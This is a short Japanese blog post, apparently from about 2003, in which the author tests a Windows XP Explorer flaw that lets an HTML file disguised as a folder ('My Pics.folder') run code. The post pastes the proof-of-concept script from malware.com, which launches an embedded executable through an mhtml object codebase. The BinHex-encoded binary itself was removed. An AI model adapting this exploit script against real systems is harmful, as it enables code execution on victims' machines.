Windows XP Explorer Executes Arbitrary Code in Folders(securitytracker.com)
WindowsXPでHTMLのスクリプトコードの含んだフォルダで任意のコマンドが実行できてしまうという話。[Full-Disclosure]のメールではなんかうさんくさいので放置していましたが、上記記事が出たのでちょっと試してみる。My Pics.folderができるがこれがHTMLで記述されていてコードが実行される。見た目からフォルダじゃんと開くと黒いwebページが開く。その後にコマンドプロンプトが立ち上がって画面がブラックアウト(実は大焦り)炎がめらめら画像が出る(malware.exeが実行)。folderのソースは付けておこう。失敗したので省略。というかやっと修復完了(´Д`;
〜〜/edit/だと思っていたけど~~/editだった。 /edit/だとPerlのエラーが出るのでなんか壊しちゃったかと思ったよぉ。(w 証拠は画像であげておきます(恥
ソースをあげてみるテスト。Binhexのmalware.exeは削除
<SCRIPT> //25.02.03 - http://www.malware.com function malware() { s=document.URL;path=s.substr(-0,s.lastIndexOf("\\")); path=unescape(path); document.write( ' <title>malware.com</title> <body scroll=no bgcolor=black> <FONT face="Comic Sans MS" color=red style="position:absolute;top:20; left:90;z-index:100; font-size:2cm;">malware.com </center> <object style="cursor:cross-hair" alt="moo ha ha" classid=" clsid:77777777-7777-7777-7777" codebase="mhtml:'+path+' \\My Pics.folder!malware.exe"></object>') } setTimeout("malware()",150) </script>
昨日はFONTタグが閉じていないうえに多重投稿でぐでぐでになってました。